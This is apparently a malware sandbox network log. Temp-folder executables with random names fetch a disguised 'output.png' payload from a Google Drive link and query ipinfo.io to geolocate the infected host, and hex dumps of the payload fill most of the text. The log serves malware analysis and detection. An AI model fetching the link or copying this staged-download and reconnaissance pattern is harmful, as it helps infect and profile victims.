2024-12-12 15:48:23 UTC	1390	IN	Data Raw: d4 66 5f d7 50 8e ca 11 fc 7e ff 68 8a f4 2a e3 1f 92 dd c0 cc f7 b8 5c ae fb dd 6e 77 6d b3 af 9c 37 b3 1f 98 4f 06 f3 71 00 0a 33 48 39 28 c4 46 6e b6 e2 42 47 25 13 bd b3 f3 a1 e6 74 46 2e 65 dc f9 f0 7b c1 5b ea 6f d6 8d 4f 30 18 1c 69 18 c6 7d 00 8a 4c bc 3c 72 fe 7f 19 86 71 9d 9c 7f 73 a8 91 a7 5e 40 c4 73 44 87 61 85 1e 9d 3a 18 af dd 34 59 d9 ab b7 d6 94 85 8a a2 5c ef 76 bb 57 d8 13 99 35 64 62 4b a6 25 5a 06 36 d0 6d 60 dc e0 b0 d8 be 03 f1 d9 a2 7b 6f c1 60 f0 08 c3 30 ee 02 30 3c ce 43 77 12 d1 43 d9 d9 d9 77 f4 eb d7 2f a1 aa 23 81 40 60 02 33 3f dd c4 53 13 54 55 7d 26 91 73 62 cf f9 b7 bf 02 e8 69 e2 90 2d cc 3c ab ad ce 6d a4 ba 4e e3 ce 29 df ba 63 e7 61 a2 e3 48 b6 03 ba 77 bd e8 cd 5b ae 29 60 e6 ab 4d 8c 20 19 44 f4 62 38 1c be b1 a8 Data Ascii: f_P~h*\nwm7Oq3H9(FnBG%tF.e{[oO0i}L<rqs^@sDa:4Y\vW5dbK%Z6m`{o`00<CwCw/#@`3?STU}&sbi-<mN)caHw[)`M Db8
2024-12-12 15:48:23 UTC	1390	IN	Data Raw: 13 d8 5d 61 21 11 5d e7 f1 78 2a 12 0b 33 71 4e 4a 6c d8 f3 fe b7 bb 00 34 b9 2f ce 5e 22 1f c6 7b f2 f2 f2 66 f5 e9 d3 a7 3a e9 01 cd d3 0a 60 28 8f 00 3c 32 e9 e7 ae f7 31 14 ba dc 8e 1e 1c 33 93 ae eb 67 2a 8a f2 57 66 ee 6d e2 90 3a 00 8f d6 d4 d4 4c 8b 39 7a 70 e2 89 1d a8 2e eb 19 30 c6 25 3d e0 e4 d8 c9 e0 cb b0 e8 b5 a4 57 ee 0f 04 02 87 37 bc 4f cd 5c ec 54 01 b8 77 fb f6 ed 77 0d 1b 36 6c 57 b2 63 31 4b 26 b6 78 2c d1 32 f0 2b 95 9b ac 34 91 5a 18 e7 c6 aa 91 88 fa f9 89 bc 70 38 7c 05 11 45 7a aa f9 71 9e fd f3 86 1e 87 b0 72 3d 4e 4b 6c 8d 12 98 7f fb 8e 88 6e 71 bb dd cf 50 32 7a 40 d1 32 64 33 af 07 f3 4c 1b 4a bf 85 41 7c 17 ba 61 3a 46 68 21 2b 1a 68 28 02 70 3f 80 61 26 0f 59 00 60 b2 aa aa 5f 99 78 2d 61 d4 b8 89 04 fa ab a0 32 79 4d 63 Data Ascii: ]a!]x3qNJl4/^"{f:`(<213gWfm:L9zp.0%=W7O\Tww6lWc1K&x,2+4Zp8\|Ezqr=NKlnqP2z@2d3LJA\|a:Fh!+h(p?a&Y`_x-a2yMc
2024-12-12 15:48:23 UTC	1390	IN	Data Raw: 36 3e 10 0c 06 b3 0c c3 f8 4b c3 76 40 66 4a 3c 59 33 8f 66 b1 55 ab 56 ed b7 69 db f6 1f 8e b9 e9 b6 7d 9e cb ca 70 7d 53 f3 d6 4b 29 57 d2 0b 7b ee 92 3f cb 64 e9 c1 55 0d c3 93 ff db 19 bf 74 c6 61 00 47 7a dc ed 2c 0e f7 13 6c ee f5 5b 5c 76 59 9d c5 ed 98 62 fd 4d d2 75 a1 51 e9 94 d4 22 96 55 35 b9 0a 7b 33 33 4f d9 be 7d 7b 7f af d7 fb 44 2a 25 b5 b6 24 f2 81 f7 7a bd 65 35 35 35 85 91 bf 47 c3 0d b1 cd 69 0f 60 7a be c2 6b 1c 9c d4 10 fd e2 0a 85 fe 5b b7 34 10 08 8c 35 0c a3 12 c0 03 26 93 da 02 c3 30 0a 54 55 9d 94 4a 49 ad 25 6c 38 6e 6f 47 d3 88 c8 88 bc 57 15 45 19 c8 cc 97 01 f8 b5 85 43 0a 88 a8 34 10 08 2c ab a8 a8 f8 2d 4a ef cb 05 b8 d4 86 a4 16 71 24 3a fd 74 8d 0d ed 98 62 7d 62 53 8c 64 95 16 4a 19 eb 6a b7 e3 97 d0 7f 17 d7 d5 11 d1 Data Ascii: 6>Kv@fJ<Y3fUVi}p}SK)W{?dUtaGz,l[\vYbMuQ"U5{33O}{D*%$ze555Gi`zk[45&0TUJI%l8noGWEC4,-Jq$:tb}bSdJj
2024-12-12 15:48:23 UTC	1390	IN	Data Raw: d3 09 73 6b 8d ec b9 9a a1 e8 d6 fb e9 e2 5b f8 a6 a7 65 25 f5 36 c9 37 65 2b 88 e7 8b 0e c3 3c 7a 17 be 5b e5 fc 5a 23 4a e3 1e 5b 23 9f 36 1d e0 87 2d 3a fb 66 80 4f c6 99 b7 ae b5 e8 fc 09 b1 e7 8f ce c6 4b f5 bf 80 74 40 4f 82 c8 8e ae bf 64 17 c6 bd a2 43 30 8d f9 3e d1 21 38 4c fa ce b1 ed ce a7 5d 05 a6 9b 93 3c 2d f4 15 14 fa 2d 7c da a7 49 3c 67 52 d8 93 d8 7c 5a 15 08 56 5d 31 38 c9 0e 84 8c bf 89 0e 42 4a b2 e8 07 37 25 e6 da 56 c0 37 6d 81 e8 20 1c 25 cd b6 ad 69 d6 59 d3 ee 00 f1 68 00 5f b6 f2 4c 0c c6 53 a8 e5 21 38 73 5a 30 49 d1 25 95 7d dd 74 e6 07 c4 dc 57 61 a3 48 f2 3e 57 13 b9 75 ad 64 15 c3 b8 1a 80 c3 57 1a f2 b5 72 b4 60 4f 9c 26 1b 8d 9a 56 ac 2d c5 0e 56 c1 b8 06 c0 0f f1 1c 1a b9 42 c8 20 d7 3b 30 78 18 ce 9a 7e 31 ce d7 1c 5b Data Ascii: sk[e%67e+<z[Z#J[#6-:fOKt@OdC0>!8L]<--\|I<gR\|ZV]18BJ7%V7m %iYh_LS!8sZ0I%}tWaH>WudWr`O&V-VB ;0x~1[
2024-12-12 15:48:23 UTC	1390	IN	Data Raw: ce 8f ee 59 d3 1b 5a 86 bb fe b5 84 10 b1 ac aa 52 ee d8 e2 4c f4 25 b6 9f 3b 3e b5 7a c9 cf db 1a 7d a2 aa 5f 02 b8 a4 91 33 f8 d1 4b af 59 6f 5c 80 42 08 53 25 27 c9 1d 5b 9c 89 fe c4 26 c2 e7 83 89 6d 91 58 75 29 98 2e fc e3 77 05 03 bb da 5a c1 4a 0a da 58 12 71 8e 2d 1d 99 49 6d 71 76 62 9a d9 51 8a 78 33 60 e8 79 00 2e 86 82 6e 0a 73 87 4b 1e 71 b6 fe 5d 2f 47 d3 c7 fb 6a 25 b1 c5 19 49 6c e2 a7 16 bc 6a c3 d1 c3 7f 04 f1 dd 40 75 5f 30 d5 95 71 5c 15 07 eb fe f9 b9 54 8b f5 65 e4 8c eb 06 9f e5 1f f8 c3 98 9d 66 84 2c e2 c0 95 43 4e 57 34 ba 97 81 3f 02 7c 5e dd d7 f8 78 3b a0 d2 63 15 f8 78 c5 d7 4d 9f 5b 5d 25 a5 c8 38 23 bf 70 71 1c 33 21 67 dc 9f 51 76 e8 3b 10 ff 0b c0 65 7a de 1f e5 be da 0e 00 46 c3 e2 fb 06 1f 3b 5f 47 8e 33 12 16 d5 8b 58 Data Ascii: YZRL%;>z}_3KYo\BS%'[&mXu).wZJXq-ImqvbQx3`y.nsKq]/Gj%Ilj@u_0q\Tef,CNW4?\|^x;cxM[]%8#pq3!gQv;ezF;_G3X

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.10	49883	172.217.17.65	443	8120	C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 15:48:21 UTC	192	OUT	GET /download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download HTTP/1.1 User-Agent: FileDownloader Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
2024-12-12 15:48:25 UTC	4915	IN	HTTP/1.1 200 OK Content-Type: image/png Content-Security-Policy: sandbox Content-Security-Policy: default-src 'none' Content-Security-Policy: frame-ancestors 'none' X-Content-Security-Policy: sandbox Cross-Origin-Opener-Policy: same-origin Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Resource-Policy: same-site X-Content-Type-Options: nosniff Content-Disposition: attachment; filename="output.png" Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED] Access-Control-Allow-Methods: GET,HEAD,OPTIONS Accept-Ranges: bytes Content-Length: 156917 Last-Modified: Mon, 11 Nov 2024 02:30:33 GMT X-GUploader-UploadID: AFiumC4T7BYIM2nc31FkkcTKvwZ_aUhNf2FC1NkKe6oOVJL6hd-mWg-j2z3pKOtUCCVftNYb0iQ Date: Thu, 12 Dec 2024 15:48:25 GMT Expires: Thu, 12 Dec 2024 15:48:25 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=h6mvlQ== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-12 15:48:25 UTC	4915	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 b6 00 00 01 b6 08 06 00 00 00 13 09 a3 70 00 00 80 00 49 44 41 54 78 9c ec dd 07 7c 14 65 fa 07 f0 df 33 9b 0a 09 bd 9d 15 44 20 64 77 36 80 d8 d0 53 9a dc 59 00 5b d6 ce a9 e7 e9 9d 05 b0 23 2a 4c c0 82 67 c5 72 96 bb bf 9e e8 a9 24 58 41 3d 95 66 c3 16 85 ec ec 12 8a 8a 9e 05 0b 9d 00 29 bb f3 fc 3f bb 49 ee 28 d9 64 76 b3 33 ef 6c f6 fd 7e 3e 7e 3e b2 bb 33 ef 93 64 77 9f 79 cb 3c 6f 06 24 49 b2 ce a8 d3 ba 82 c2 c7 2b 8c 61 0c 14 02 74 08 08 3d c0 68 0f 80 40 a8 02 d3 06 10 af 23 c6 2a 03 fc 11 80 25 58 f4 da cf a2 43 97 a4 54 45 a2 03 90 a4 36 67 cc 98 f6 08 e5 fa 88 30 01 c0 71 00 94 04 ce f2 11 13 3d 03 64 3e 87 85 65 5b 2d 88 52 92 da 2c 99 d8 24 29 59 4e 3c b1 03 ea 32 27 12 d3 24 00 dd 92 Data Ascii: PNGIHDRpIDATx\|e3D dw6SY[#Lgr$XA=f)?I(dv3l~>~>3dwy<o$I+at=h@#%XCTE6g0q=d>e[-R,$)YN<2'$
2024-12-12 15:48:25 UTC	4868	IN	Data Raw: b8 8f 6d b0 aa aa 13 4c 25 b5 58 26 5c bf 63 68 76 d7 cd 7b 27 b5 86 36 04 d4 e8 92 a4 ff 71 b9 5c 31 df 83 59 59 59 09 ed b7 e6 76 bb ab 54 55 d5 5c 2e 97 4a f1 d7 58 ed 07 60 7e 43 79 ae c2 44 da 97 12 27 13 9b 43 31 33 05 02 81 09 86 61 7c 19 b9 02 8c e3 8a b1 d1 97 cc ec f3 7a bd a3 54 55 4d ca 0e c1 2e 97 ab c9 2f 08 22 11 c5 27 25 e9 7f 9a 9b 63 ab ae ae 6e d5 46 a2 85 85 85 6b 3d 1e 8f cf 30 8c d1 09 ec 8e d1 58 9e 6b 76 79 79 79 c7 d6 c4 21 99 27 13 9b 03 05 02 81 c3 03 81 c0 32 66 7e 3a c1 31 fe 92 9c 9c 1c 8f d7 eb 4d 6a 25 ff 70 38 dc e4 17 84 ec b1 49 a2 35 d7 63 cb cd cd 4d ca 0e d9 45 45 45 8b 36 6c d8 30 84 99 2f 03 f0 6b 1c 87 66 02 98 98 9d 9d fd 95 ae eb 93 4a 4b 4b e5 e7 c5 62 32 b1 39 c8 aa 55 ab f6 6b 28 83 f5 09 80 a3 e2 3c dc 00 a2 Data Ascii: mL%X&\chv{'6q\1YYYvTU\.JX`~CyD'C13a\|zTUM./"'%cnFk=0Xkvyyy!'2f~:1Mj%p8I5cMEEE6l0/kfJKKb29Uk(<
2024-12-12 15:48:25 UTC	1322	IN	Data Raw: 53 a2 8c 51 20 10 18 bb 71 7b d5 a3 7f 7f 7b e9 fe cf bf ff 31 0c 13 c3 93 5d 3b e4 1b 63 06 b9 9f ef cf 35 17 6a 9a e6 8c 25 e4 a3 c6 17 82 30 48 61 2e 00 63 00 13 f6 03 a8 3d c0 1d 81 68 45 ff 1a 10 aa 86 f4 39 b8 5f df 5e 3d 3a 1c dc a3 1b 0e e9 d9 1d 45 bd 0f 42 7e 6e 4e a4 c7 36 d3 e3 f1 d8 ba 22 4f b8 52 2d 0b c0 53 00 9d 2b a0 f5 1d 60 f6 e1 2c ed 0d 01 6d ff 57 ea 24 b6 46 a5 33 fb 80 8d 1b 41 f8 03 80 9c 24 9c 31 08 c2 9d e0 81 2f a4 fb cd d7 66 04 02 81 a7 98 f9 c2 bd 1f 67 e6 81 5e af d7 f6 b1 f4 78 24 38 ec b8 25 72 2d bc 61 c3 86 47 46 8c 18 e1 8c 2f 7b 93 2a 2a 2a da 2b 8a 72 7d e0 bb 1f a6 ce 7a 71 41 a6 ff 1b 73 53 a0 9e 83 f6 af 3a a1 c8 f3 97 fb 26 5f fe ac e5 41 ee 6d ec d8 76 d8 49 a7 29 84 93 99 69 04 80 5e 89 9c 46 21 c2 c0 03 f6 43 Data Ascii: SQ q{{1];c5j%0Ha.c=hE9_^=:EB~nN6"OR-S+`,mW$F3A$1/fg^x$8%r-aGF/{***+r}zqAsS:&_AmvI)i^F!C
2024-12-12 15:48:25 UTC	1390	IN	Data Raw: 64 c9 01 31 5f 38 fa d4 e1 44 ca 62 27 27 35 d4 6f 18 76 3e 6d aa 7b 13 27 9e d8 41 74 2c 52 eb a4 65 62 4b ab 6a 04 49 16 eb a2 40 51 14 5b 13 5b 45 45 c5 90 40 20 b0 ac 61 4b 19 b3 73 69 5f 30 73 a4 67 39 21 5d e6 d2 e2 e1 76 bb bf 54 55 f5 94 11 ea c0 71 2f df 34 e9 1b 33 7b bf ed aa ad c5 cb 1f 97 7b a7 fc df f3 df 4c 7b ec c9 07 96 2c 59 b2 67 f1 84 d1 e3 4e 26 e6 7f 03 e8 68 71 f8 49 c2 23 a9 36 eb 1d 99 dc 52 5b 5a 26 36 d9 63 4b 9c e8 1e 9b df ef ef ac eb fa 6c 45 51 3e 8d 63 2e 6d 33 80 c9 95 95 95 47 78 bd de 8f 2c 0e 31 e5 79 3c 9e f9 a1 ea ea c2 cb 7f 3f b2 64 de f5 57 d4 1c ef 1e d0 e2 31 5f ae ff d9 75 db bc d7 26 dd 31 ff ed 5f 1e 2d 7b e9 94 e8 83 23 c6 1f 49 4c 73 01 a4 da 3e 70 47 50 6d d6 ab 38 f1 c4 54 8b 5b 6a 60 45 69 2a c7 93 3d b6 Data Ascii: d1_8Db''5ov>m{'At,RebKjI@Q[[EE@ aKsi_0sg9!]vTUq/43{{L{,YgN&hqI#6R[Z&6cKlEQ>c.m3Gx,1y<?dW1_u&1_-{#ILs>pGPm8T[j`Ei*=
2024-12-12 15:48:25 UTC	1390	IN	Data Raw: fd 13 11 fd c1 ed 76 1f 2f 93 5a ea 61 d0 6f 45 c7 20 04 e3 38 d1 21 48 b1 a5 65 62 4b eb ca 23 44 97 88 f8 bb bf ba f5 3f 30 f6 dc ee 26 c4 cc f7 e7 e4 e4 0c f0 78 3c 73 88 28 0d 2f fc 53 5c fd ea c0 be a2 c3 10 41 01 62 de ce 22 89 97 96 43 91 69 dd 63 63 9c 26 a2 d9 f5 75 3b b1 b2 7a 0b 3c b9 9d 23 ff 5c 6a 18 c6 55 45 45 45 01 11 b1 48 49 b2 a1 ba 1f 6c de 39 dd 29 98 94 96 77 5f 95 84 49 cb c4 96 b6 3d b6 17 6f 3b 18 e1 70 6f 51 cd 2f db f9 f3 36 b5 5d 97 ab dc 6e f7 33 b2 87 d6 06 b8 70 68 fa 6e c1 c9 fd 44 47 20 c5 96 96 43 91 69 db 63 0b 87 3d 22 9b 7f fc d7 55 af cb 61 c7 36 c4 50 ba 88 0e 41 a0 74 fe d9 1d 2f 2d 13 5b da f6 d8 80 83 44 36 5e cb c6 7e 22 db 97 92 8c 90 2f 3a 04 81 da a1 b8 38 2d 87 61 53 41 5a 26 b6 b4 ed b1 11 89 fe 22 6a 7d 2d Data Ascii: v/ZaoE 8!HebK#D?0&x<s(/S\Ab"Cicc&u;z<#\jUEEEHIl9)w_I=o;poQ/6]n3phnDG Cic="Ua6PAt/-[D6^~"/:8-aSAZ&"j}-
2024-12-12 15:48:25 UTC	1390	IN	Data Raw: d4 66 5f d7 50 8e ca 11 fc 7e ff 68 8a f4 2a e3 1f 92 dd c0 cc f7 b8 5c ae fb dd 6e 77 6d b3 af 9c 37 b3 1f 98 4f 06 f3 71 00 0a 33 48 39 28 c4 46 6e b6 e2 42 47 25 13 bd b3 f3 a1 e6 74 46 2e 65 dc f9 f0 7b c1 5b ea 6f d6 8d 4f 30 18 1c 69 18 c6 7d 00 8a 4c bc 3c 72 fe 7f 19 86 71 9d 9c 7f 73 a8 91 a7 5e 40 c4 73 44 87 61 85 1e 9d 3a 18 af dd 34 59 d9 ab b7 d6 94 85 8a a2 5c ef 76 bb 57 d8 13 99 35 64 62 4b a6 25 5a 06 36 d0 6d 60 dc e0 b0 d8 be 03 f1 d9 a2 7b 6f c1 60 f0 08 c3 30 ee 02 30 3c ce 43 77 12 d1 43 d9 d9 d9 77 f4 eb d7 2f a1 aa 23 81 40 60 02 33 3f dd c4 53 13 54 55 7d 26 91 73 62 cf f9 b7 bf 02 e8 69 e2 90 2d cc 3c ab ad ce 6d a4 ba 4e e3 ce 29 df ba 63 e7 61 a2 e3 48 b6 03 ba 77 bd e8 cd 5b ae 29 60 e6 ab 4d 8c 20 19 44 f4 62 38 1c be b1 a8 Data Ascii: f_P~h*\nwm7Oq3H9(FnBG%tF.e{[oO0i}L<rqs^@sDa:4Y\vW5dbK%Z6m`{o`00<CwCw/#@`3?STU}&sbi-<mN)caHw[)`M Db8
2024-12-12 15:48:25 UTC	1390	IN	Data Raw: 13 d8 5d 61 21 11 5d e7 f1 78 2a 12 0b 33 71 4e 4a 6c d8 f3 fe b7 bb 00 34 b9 2f ce 5e 22 1f c6 7b f2 f2 f2 66 f5 e9 d3 a7 3a e9 01 cd d3 0a 60 28 8f 00 3c 32 e9 e7 ae f7 31 14 ba dc 8e 1e 1c 33 93 ae eb 67 2a 8a f2 57 66 ee 6d e2 90 3a 00 8f d6 d4 d4 4c 8b 39 7a 70 e2 89 1d a8 2e eb 19 30 c6 25 3d e0 e4 d8 c9 e0 cb b0 e8 b5 a4 57 ee 0f 04 02 87 37 bc 4f cd 5c ec 54 01 b8 77 fb f6 ed 77 0d 1b 36 6c 57 b2 63 31 4b 26 b6 78 2c d1 32 f0 2b 95 9b ac 34 91 5a 18 e7 c6 aa 91 88 fa f9 89 bc 70 38 7c 05 11 45 7a aa f9 71 9e fd f3 86 1e 87 b0 72 3d 4e 4b 6c 8d 12 98 7f fb 8e 88 6e 71 bb dd cf 50 32 7a 40 d1 32 64 33 af 07 f3 4c 1b 4a bf 85 41 7c 17 ba 61 3a 46 68 21 2b 1a 68 28 02 70 3f 80 61 26 0f 59 00 60 b2 aa aa 5f 99 78 2d 61 d4 b8 89 04 fa ab a0 32 79 4d 63 Data Ascii: ]a!]x3qNJl4/^"{f:`(<213gWfm:L9zp.0%=W7O\Tww6lWc1K&x,2+4Zp8\|Ezqr=NKlnqP2z@2d3LJA\|a:Fh!+h(p?a&Y`_x-a2yMc
2024-12-12 15:48:25 UTC	1390	IN	Data Raw: 36 3e 10 0c 06 b3 0c c3 f8 4b c3 76 40 66 4a 3c 59 33 8f 66 b1 55 ab 56 ed b7 69 db f6 1f 8e b9 e9 b6 7d 9e cb ca 70 7d 53 f3 d6 4b 29 57 d2 0b 7b ee 92 3f cb 64 e9 c1 55 0d c3 93 ff db 19 bf 74 c6 61 00 47 7a dc ed 2c 0e f7 13 6c ee f5 5b 5c 76 59 9d c5 ed 98 62 fd 4d d2 75 a1 51 e9 94 d4 22 96 55 35 b9 0a 7b 33 33 4f d9 be 7d 7b 7f af d7 fb 44 2a 25 b5 b6 24 f2 81 f7 7a bd 65 35 35 35 85 91 bf 47 c3 0d b1 cd 69 0f 60 7a be c2 6b 1c 9c d4 10 fd e2 0a 85 fe 5b b7 34 10 08 8c 35 0c a3 12 c0 03 26 93 da 02 c3 30 0a 54 55 9d 94 4a 49 ad 25 6c 38 6e 6f 47 d3 88 c8 88 bc 57 15 45 19 c8 cc 97 01 f8 b5 85 43 0a 88 a8 34 10 08 2c ab a8 a8 f8 2d 4a ef cb 05 b8 d4 86 a4 16 71 24 3a fd 74 8d 0d ed 98 62 7d 62 53 8c 64 95 16 4a 19 eb 6a b7 e3 97 d0 7f 17 d7 d5 11 d1 Data Ascii: 6>Kv@fJ<Y3fUVi}p}SK)W{?dUtaGz,l[\vYbMuQ"U5{33O}{D*%$ze555Gi`zk[45&0TUJI%l8noGWEC4,-Jq$:tb}bSdJj
2024-12-12 15:48:25 UTC	1390	IN	Data Raw: d3 09 73 6b 8d ec b9 9a a1 e8 d6 fb e9 e2 5b f8 a6 a7 65 25 f5 36 c9 37 65 2b 88 e7 8b 0e c3 3c 7a 17 be 5b e5 fc 5a 23 4a e3 1e 5b 23 9f 36 1d e0 87 2d 3a fb 66 80 4f c6 99 b7 ae b5 e8 fc 09 b1 e7 8f ce c6 4b f5 bf 80 74 40 4f 82 c8 8e ae bf 64 17 c6 bd a2 43 30 8d f9 3e d1 21 38 4c fa ce b1 ed ce a7 5d 05 a6 9b 93 3c 2d f4 15 14 fa 2d 7c da a7 49 3c 67 52 d8 93 d8 7c 5a 15 08 56 5d 31 38 c9 0e 84 8c bf 89 0e 42 4a b2 e8 07 37 25 e6 da 56 c0 37 6d 81 e8 20 1c 25 cd b6 ad 69 d6 59 d3 ee 00 f1 68 00 5f b6 f2 4c 0c c6 53 a8 e5 21 38 73 5a 30 49 d1 25 95 7d dd 74 e6 07 c4 dc 57 61 a3 48 f2 3e 57 13 b9 75 ad 64 15 c3 b8 1a 80 c3 57 1a f2 b5 72 b4 60 4f 9c 26 1b 8d 9a 56 ac 2d c5 0e 56 c1 b8 06 c0 0f f1 1c 1a b9 42 c8 20 d7 3b 30 78 18 ce 9a 7e 31 ce d7 1c 5b Data Ascii: sk[e%67e+<z[Z#J[#6-:fOKt@OdC0>!8L]<--\|I<gR\|ZV]18BJ7%V7m %iYh_LS!8sZ0I%}tWaH>WudWr`O&V-VB ;0x~1[
2024-12-12 15:48:25 UTC	1390	IN	Data Raw: ce 8f ee 59 d3 1b 5a 86 bb fe b5 84 10 b1 ac aa 52 ee d8 e2 4c f4 25 b6 9f 3b 3e b5 7a c9 cf db 1a 7d a2 aa 5f 02 b8 a4 91 33 f8 d1 4b af 59 6f 5c 80 42 08 53 25 27 c9 1d 5b 9c 89 fe c4 26 c2 e7 83 89 6d 91 58 75 29 98 2e fc e3 77 05 03 bb da 5a c1 4a 0a da 58 12 71 8e 2d 1d 99 49 6d 71 76 62 9a d9 51 8a 78 33 60 e8 79 00 2e 86 82 6e 0a 73 87 4b 1e 71 b6 fe 5d 2f 47 d3 c7 fb 6a 25 b1 c5 19 49 6c e2 a7 16 bc 6a c3 d1 c3 7f 04 f1 dd 40 75 5f 30 d5 95 71 5c 15 07 eb fe f9 b9 54 8b f5 65 e4 8c eb 06 9f e5 1f f8 c3 98 9d 66 84 2c e2 c0 95 43 4e 57 34 ba 97 81 3f 02 7c 5e dd d7 f8 78 3b a0 d2 63 15 f8 78 c5 d7 4d 9f 5b 5d 25 a5 c8 38 23 bf 70 71 1c 33 21 67 dc 9f 51 76 e8 3b 10 ff 0b c0 65 7a de 1f e5 be da 0e 00 46 c3 e2 fb 06 1f 3b 5f 47 8e 33 12 16 d5 8b 58 Data Ascii: YZRL%;>z}_3KYo\BS%'[&mXu).wZJXq-ImqvbQx3`y.nsKq]/Gj%Ilj@u_0q\Tef,CNW4?\|^x;cxM[]%8#pq3!gQv;ezF;_G3X

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.10	49889	216.58.208.238	443	1528	C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 15:48:23 UTC	150	OUT	GET /uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download HTTP/1.1 User-Agent: FileDownloader Host: drive.google.com Cache-Control: no-cache
2024-12-12 15:48:24 UTC	1319	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Thu, 12 Dec 2024 15:48:24 GMT Location: https://drive.usercontent.google.com/download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: script-src 'report-sample' 'nonce-nweYaxKkoqcO7gEBEqEvvg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.10	49895	34.117.59.81	443	8092	C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 15:48:25 UTC	91	OUT	GET /json HTTP/1.1 User-Agent: IPInfoFetcher Host: ipinfo.io Cache-Control: no-cache
2024-12-12 15:48:26 UTC	345	IN	HTTP/1.1 200 OK access-control-allow-origin: * Content-Length: 321 content-type: application/json; charset=utf-8 date: Thu, 12 Dec 2024 15:48:26 GMT x-content-type-options: nosniff via: 1.1 google strict-transport-security: max-age=2592000; includeSubDomains Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-12 15:48:26 UTC	321	IN	Data Raw: 7b 0a 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 0a 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 31 38 39 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 0a 20 20 22 63 69 74 79 22 3a 20 22 4e 65 77 20 59 6f 72 6b 20 43 69 74 79 22 2c 0a 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 22 6c 6f 63 22 3a 20 22 34 30 2e 37 31 34 33 2c 2d 37 34 2e 30 30 36 30 22 2c 0a 20 20 22 6f 72 67 22 3a 20 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 0a 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 31 30 30 30 31 22 2c 0a 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a Data Ascii: { "ip": "8.46.123.189", "hostname": "static-cpe-8-46-123-189.centurylink.com", "city": "New York City", "region": "New York", "country": "US", "loc": "40.7143,-74.0060", "org": "AS3356 Level 3 Parent, LLC", "postal": "10001", "timezone":

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.10	49896	172.217.17.65	443	1528	C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 15:48:26 UTC	192	OUT	GET /download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download HTTP/1.1 User-Agent: FileDownloader Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
